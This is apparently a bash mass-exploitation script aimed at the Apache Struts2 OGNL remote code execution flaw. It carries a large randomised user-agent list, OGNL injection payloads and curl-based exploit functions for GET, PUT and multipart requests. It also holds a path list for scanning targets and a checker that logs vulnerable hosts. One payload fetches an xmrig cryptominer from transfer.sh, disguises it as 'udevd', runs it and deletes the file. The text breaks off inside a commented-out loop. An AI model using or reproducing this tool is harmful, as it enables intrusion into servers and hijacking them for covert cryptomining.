| Mozilla/5.0 (Linux; Android 6.0; MotoG3 Build/MPIS24.65-33.1-2-4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.19 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3 Build/MPIS24.65-33.1-2-4; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3 Build/MPIS24.65-33.1-2-4; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/103.0.0.12.69;] | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3-TE Build/MPD24.65-33) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3-TE Build/MPD24.65-33-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3-TE Build/MPDS24.65-33-1-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; MotoG3-TE Build/MPDS24.65-33-1-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; Positivo Twist 4G Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; Positivo Twist M Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; pt-br; 5010E Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; Quantum MUV Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1068 Build/MPB24.65-34) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1068 Build/MPB24.65-34) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1068 Build/MPB24.65-34) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1068 Build/MPB24.65-34-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1068 Build/MPB24.65-34-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1068 Build/MPB24.65-34-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1069 Build/MPB24.65-10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1069 Build/MPB24.65-34-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1069 Build/MPB24.65-34-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1069 Build/MPB24.65-34-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1069 Build/MPB24.65-34-3; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1078 Build/MPBS24.65-34-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1078 Build/MPBS24.65-34-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1097 Build/MPES24.49-18-7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1097 Build/MPES24.49-18-7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1580 Build/MPKS24.78-8-6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 6.0; XT1580 Build/MPKS24.78-8-6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 7.0; Moto G (4) Build/NPJ25.93-14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 7.0; Moto G (4) Build/NPJ25.93-14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; U; Android 2.3.5; pt-br; GC500SF Build/GRJ90) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 | |
| Mozilla/5.0 (Linux; U; Android 2.3.6; pt-br; GT-S5367 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 | |
| Mozilla/5.0 (Linux; U; Android 2.3.6; pt-br; GT-S5830C Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 | |
| Mozilla/5.0 (Linux; U; Android 2.3.6; pt-br; GT-S6102B Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 | |
| Mozilla/5.0 (Linux; U; Android 2.3.6; pt-br; LG-E400f Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 MMS/LG-Android-MMS-V1.2 | |
| Mozilla/5.0 (Linux; U; Android 4.0.4; pt-br; GT-S7562L Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.0.4; pt-br; LG-E615f Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.1.1; C1604 Build/11.3.A.2.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 OPR/20.1.2254.110627 | |
| Mozilla/5.0 (Linux; U; Android 4.1.2; pt-br; GT-I8552B Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.1.2; pt-br; GT-I9100 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.1.2; pt-br; GT-I9300 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.1.2; pt-br; LG-E410f Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.1.2; pt-br; LG-E425f Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.1.2; pt-br; LG-P716 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.2.2; pt-br; ALCATEL ONE TOUCH 7040E Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.2.2; pt-br; GT-I8200L Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.2.2; pt-br; GT-I9063T Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.2.2; pt-br; GT-I9082L Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.2.2; pt-br; GT-S7582L Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.2.2; pt-br; SM-G3812B Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.2.2; pt-pt; GT-I9060 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.4.2; pt-br; LG-D105 Build/KOT49I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.1599.103 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; U; Android 4.4.2; pt-br; LG-D125 Build/KOT49I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.1599.103 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; U; Android 4.4.2; pt-br; LG-D325 Build/KOT49I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.1599.103 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; U; Android 4.4.2; pt-br; LG-D385 Build/KOT49I.A1405661439) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.1599.103 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; U; Android 4.4.2; pt-br; LG-H222 Build/KOT49I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; U; Android 4.4.2; pt-br; SM-G313M Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.4.2; pt-br; SM-G355M Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.4.2; pt-br; SonyD2104 Build/20.1.B.2.29) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.4.4; pt-; XT1025 Build/KXC21.5-40) AppleWebKit/534.24 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.24 T5/2.0 bdbrowser/6.4.0.4 | |
| Mozilla/5.0 (Linux; U; Android 4.4.4; pt-br; SM-G530BT Build/KTU84P) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 4.4.4; pt-br; SM-G530H Build/KTU84P) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 5.1.1; Lenovo A6020l36 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 OPR/21.0.2254.111920 | |
| Mozilla/5.0 (Linux; U; Android 5.1.1; pt-BR; SM-G531H Build/LMY48B) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.2.0.915 U3/0.8.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 6.0.0; pt-br; SM-G900M Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Linux; U; Android 6.0; pt-BR; XT1078 Build/MPBS24.65-34-5) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.1.5.890 U3/0.8.0 Mobile Safari/534.30 | |
| Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; RM-1068) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 | |
| Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; RM-1092) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 | |
| Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; RM-1109) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 | |
| Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 520) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 | |
| Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530 Dual SIM) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 | |
| Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630 Dual SIM) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 | |
| Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 | |
| Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 820) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 | |
| Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 830) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 | |
| Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; NOKIA; Lumia 630 Dual SIM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586 | |
| Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1067) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 | |
| Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1092) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 | |
| Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1109) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 | |
| Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1109) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Mobile Safari/537.36 Edge/15.14965 | |
| Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530 Dual SIM) like Gecko | |
| Nokia7230-1c/5.0 (05.71) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+ | |
| Opera/9.80 (Android; Opera Mini/20.0.2254/37.9339; U; pt) Presto/2.12.423 Version/12.16 | |
| Opera/9.80 (Android; Opera Mini/21.0.2254/37.9339; U; pt) Presto/2.12.423 Version/12.16 | |
| TXT | |
| readonly COOKIE=$( mktemp --dry-run ) | |
| trap "rm -rf ${COOKIE}" EXIT | |
| readonly CMD='whoami' | |
| readonly CMD_LNX='whoami' | |
| readonly CMD_WIN='whoami' | |
| readonly TIMEOUT=10 | |
| readonly CONNECT_TIMEOUT=10 | |
| readonly MAX_TIME=10 | |
| readonly USERAGENT=$( sort -R <<< "${USER_AGENT_LIST}" | head -n1 ) | |
| readonly GOOD_KEY=$( head /dev/urandom | tr -dc A-F0-9 | head -c10 ) | |
| # get OS | |
| readonly OS_EXEC='(#[email protected]@getProperty("os.name")).(#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Set-Cookie","'${GOOD_KEY}'="+#os))' | |
| readonly OS_PAYLOAD='%{(#_="multipart/form-data").(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${OS_EXEC}"'}' | |
| # cmd to exec | |
| readonly CMD_EXEC='pkill -9 bioset;cd /tmp;curl -s https://transfer.sh/RBIyE/xmrig > udevd || wget -q -O udevd https://transfer.sh/RBIyE/xmrig;chmod a+x udevd;./udevd;rm -rf udevd;echo 128 > /proc/sys/vm/nr_hugepages;sysctl -w vm.nr_hugepages=128;id;exit' | |
| #readonly CMD_EXEC='id;exit' | |
| readonly CMD_PAYLOAD="%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD_WIN}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" | |
| # check HEAD METHOD | |
| function hrce(){ | |
| local url="$1" | |
| local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 ) | |
| sudo -u bebete curl -kIis --stderr /dev/null \ | |
| --retry 3 \ | |
| --tcp-nodelay \ | |
| --globoff \ | |
| -H 'Accept-Encoding: identity' \ | |
| -H "Cookie: JSESSIONID=${JSESSIONID}" \ | |
| -H 'Connection: close' \ | |
| --location \ | |
| --max-redirs 3 \ | |
| --connect-timeout ${CONNECT_TIMEOUT} \ | |
| --max-time ${MAX_TIME} \ | |
| --user-agent "${USERAGENT}" \ | |
| --url "${url}" | |
| } | |
| # exploit GET METHOD | |
| function rce(){ | |
| local url="$1" | |
| local payload="$2" | |
| local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 ) | |
| sudo -u bebete curl -kis --stderr /dev/null \ | |
| --retry 2 \ | |
| --tcp-nodelay \ | |
| --globoff \ | |
| -H 'Content-Type: '"${payload}" \ | |
| -H 'Accept-Encoding: identity' \ | |
| -H "Cookie: JSESSIONID=${JSESSIONID}" \ | |
| -H 'Connection: close' \ | |
| --location \ | |
| --max-redirs 2 \ | |
| --connect-timeout ${CONNECT_TIMEOUT} \ | |
| --max-time ${MAX_TIME} \ | |
| --user-agent "${USERAGENT}" \ | |
| --url "${url}" | |
| } | |
| # exploit PUT METHOD | |
| function put_rce(){ | |
| local url="$1" | |
| local payload="$2" | |
| local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 ) | |
| sudo -u bebete curl -kis --stderr /dev/null --retry 2 -X PUT \ | |
| --location --max-redirs 2 \ | |
| -H 'Content-Type: '"${payload}" \ | |
| -H "Cookie: JSESSIONID=${JSESSIONID}" \ | |
| -H 'Connection: close' \ | |
| -H 'Content-Length: 0' \ | |
| -H 'Accept-Encoding: identity' \ | |
| --connect-timeout ${CONNECT_TIMEOUT} \ | |
| --max-time ${MAX_TIME} \ | |
| --user-agent "${USERAGENT}" \ | |
| --url "${url}" | |
| } | |
| # exploit MULTI METHOD | |
| function generic_rce(){ | |
| local method="$1" | |
| local url="$2" | |
| local payload="$3" | |
| local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 ) | |
| curl -kis --retry 2 -X ${method} \ | |
| --location --max-redirs 2 \ | |
| -H 'Content-Type: '"${payload}" \ | |
| -H 'Cookie: JSESSIONID='"${JSESSIONID}" \ | |
| -H 'Connection: close' \ | |
| -H 'Content-Length: 0' \ | |
| -H 'Accept-Encoding: identity' \ | |
| --connect-timeout ${CONNECT_TIMEOUT} \ | |
| --max-time ${MAX_TIME} \ | |
| --user-agent "${USERAGENT}" \ | |
| --url "${url}" | |
| } | |
| # exploit multipart METHOD | |
| function multipart_rce(){ | |
| local method="$1" | |
| local url="$2" | |
| local payload="$3" | |
| local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 ) | |
| sudo -u bebete curl -X ${method} -kis --stderr /dev/null --retry 2 \ | |
| --location --max-redirs 2 \ | |
| -H 'Connection: close' \ | |
| -H 'Content-Length: 10000000' \ | |
| -H 'Accept-Encoding: identity' \ | |
| -H 'Upgrade-Insecure-Requests: 1' \ | |
| -H 'Expect:' \ | |
| -F "upload=@/dev/null;type=text/plain;filename=${payload}" \ | |
| --connect-timeout ${CONNECT_TIMEOUT} \ | |
| --max-time ${MAX_TIME} \ | |
| --user-agent "${USERAGENT}" \ | |
| --url "${url}" | |
| } | |
| function check(){ | |
| local url="$1" | |
| local buffer="$2" | |
| local hos="$( grep -ioP '\(Win64|Ubuntu|Unix|Win32|Red Hat|NETWARE|Debian.+?|FreeBSD\)' <<< "${buffer}" | tr -d $'\r' | head -n1 )" | |
| local loc="$( grep -ioP 'Location:.+' <<< "${buffer}" | tr -d $'\r' | head -n1 )" | |
| local srv="$( grep -ioP 'Server:.+' <<< "${buffer}" | tr -d $'\r' | head -n1 )" | |
| [ -z "${hos}" ] && hos='n/a' | |
| [ -z "${loc}" ] && loc='n/a' | |
| [ -z "${srv}" ] && srv='n/a' | |
| local os=$( grep -F 'Set-Cookie:' <<< "${buffer}" | tr -d $'\r' | grep -F "${GOOD_KEY}" | cut -d '=' -f2- | head -n1 ) | |
| if [ ! -z "${os}" ]; then | |
| printf '[+] vul os+: %s os: %s\n' "${url}" "${os}" | tee -a vul-os.dat | |
| exit 0 | |
| fi | |
| local uid="$( grep -P '(uid|guid|groups)=[0-9]{1,5}\(.+?\)' <<< "${buffer}" | tr -d $'\r' | head -n1 )" | |
| if [ ! -z "${uid}" ]; then | |
| printf '[+] vul uid: %s (%s) (%s) (%s)\n' "${url}" "${uid}" "${hos}" "${loc}" | tee -a vul-uid.dat | |
| exit 0 | |
| fi | |
| if grep -qF 'X-Frame-Options: 65025' <<< "${buffer}"; then | |
| printf '[+] vul xfo: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${srv}" "${loc}" | tee -a vul-dispatcher.dat | |
| exit 0 | |
| fi | |
| if grep -qF 'org.apache.struts' <<< "${buffer}"; then | |
| printf '[+] vul str: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${srv}" "${loc}" | tee -a vul-apache.struts.dat | |
| exit 0 | |
| fi | |
| if grep -qP 'HTTP/1\.(1|0) 123\b' <<< "${buffer}"; then | |
| printf '[+] vul 123: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${srv}" "${loc}" | tee -a vul-apache.struts.dat | |
| exit 0 | |
| fi | |
| if ! grep -qF 'HTTP/1.' <<< "${buffer}"; then | |
| exit 1 | |
| fi | |
| } | |
| function is_struts(){ | |
| local url="$1" | |
| local buffer="$( hrce "${url}" )" | |
| local struts="$( grep -iP 'Servlet|Tomcat|JBoss|Coyote|JSESSIONID|Jenkins|CJServer|Jetty|GlassFish|Oracle|Payara|JSP/|Java|mod_jk|nginx' <<< "${buffer}" | tr -d $'\r' | head -n1 )" | |
| local hos="$( grep -ioP '\(Win64|Ubuntu|Unix|Win32|Red Hat|Debian GNU/Linux|NETWARE|Debian|FreeBSD\)' <<< "${buffer}" | tr -d $'\r' | head -n1 )" | |
| local loc="$( grep -ioP 'Location:.+' <<< "${buffer}" | tr -d $'\r' | head -n1 )" | |
| if [ ! -z "${struts}" ]; then | |
| [ -z "${hos}" ] && hos='n/a' | |
| [ -z "${loc}" ] && loc='n/a' | |
| #printf '[!] yes struts: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${loc}" "${struts}" | tee -a is-struts.dat | |
| printf '[!] yes struts: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${loc}" "${struts}" >> is-struts.dat | |
| else | |
| #printf '[#] no struts: %s\n' "${url}" | |
| exit 1 | |
| fi | |
| } | |
| ################################################################################ | |
| # path list | |
| ################################################################################ | |
| read -d '\n' -r PATH_LIST <<-'TXT' | |
| / | |
| /Hello.World | |
| /servlet/ | |
| /index.do | |
| /public/ | |
| /login | |
| /admin/home.do | |
| /Logon.do | |
| /index.jsp | |
| /cms/login?service= | |
| /mainPage.do | |
| /login_input.do | |
| /inventor/index.jsp | |
| /main.jspx;jsessionid= | |
| /error/errorEvents.action | |
| /appview/main.action;jsessionid= | |
| /login.do;jsessionid= | |
| /welcome.do;jsessionid= | |
| /login;jsessionid= | |
| /login.action;jsessionid= | |
| /Login.action;jsessionid= | |
| /auth/login.fxl | |
| /portal/ | |
| /account/login;jsessionid= | |
| /webcommon/ | |
| /etc/ | |
| /login.html | |
| /iframe/index!index.action | |
| /index.action | |
| /user/login.action | |
| /LoginForm | |
| /adminManage/index | |
| /main.html | |
| /system/Login.do | |
| /bbs/bbs/view.act | |
| /help.action | |
| /userlogin!doDefault.action | |
| /default.action | |
| /login.action | |
| /admin.action | |
| /auth/start | |
| /Pages/login?domain_login=true | |
| /admin/index.do | |
| /ipmsLogin.jsp | |
| /dhis-web-commons/security/login.action | |
| /security/login.hlt | |
| /security/ | |
| /Default.action | |
| /login.do | |
| /index!index.action | |
| /site/index.action | |
| /showNews.action | |
| /app/login.action | |
| /app/ | |
| /api/ | |
| /vportal/web/gateway/home.action | |
| /WebApp/ | |
| /index2.jsp | |
| /pages/common/sessonExceptionPage.jsp | |
| /pages/ | |
| /common/ | |
| /bamboo/about.action | |
| /bamboo/ | |
| /login.html;jsessionid= | |
| /viewAdministrators.action | |
| /content!mail.action | |
| /base.action?page=login | |
| /eDocs-Accounts/ | |
| /user/main-1.html | |
| /edms/index.do | |
| /login.jsp | |
| /invoice-homepage/ | |
| /login/ | |
| /admin/ | |
| /web/loginPage.do2 | |
| /web/ | |
| /vas/ | |
| /Index_showIndex.do | |
| /userLogin.action | |
| /index2.jsp | |
| /orders.xhtml | |
| /struts2-showcase/index.action | |
| /login-before.xhtml | |
| /account/login.jsp | |
| /service/ | |
| /eDocs-Accounts/ | |
| /admin/timeout.jsp | |
| /Secure/ | |
| /portal/ | |
| /upload/ | |
| /themes/ | |
| /content/ | |
| /var/ | |
| /pages/common/sessonExceptionPage.jsp | |
| /cache/ | |
| /store/index | |
| /cms/portal/phone/index.jsp | |
| /accounts | |
| /welcome | |
| /anonymous/login.xhtml | |
| /Tomcat | |
| /JBoss | |
| /common/index/style/login/loginJY.jsp | |
| /index?first=true | |
| /cms/login | |
| /cms/ | |
| /pages/error404.jsp | |
| /login/error.jsp | |
| /ezon/ | |
| /login-v2.action | |
| /m/main.do | |
| /v2/index.html | |
| /plugins/servlet/ | |
| /appservices/v1/status | |
| /error/errorEvents.action | |
| /login_authLogin.action | |
| /error/errorEvents.action | |
| /j_spring_security_check | |
| /login.action?login_error=1 | |
| /Login!start.action | |
| /doUpload.action | |
| TXT | |
| # check | |
| #is_struts "${IPv4}/" | |
| #dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Qualys-Struts',3195*5088)}.multipart/form-data" | |
| #dispatcher='%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("X-Frame-Options",255)}.multipart/form-data' | |
| #dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].sendError(0)}" | |
| #for XPATH in ${PATH_LIST}; do | |
| # for METHOD in POST; do | |
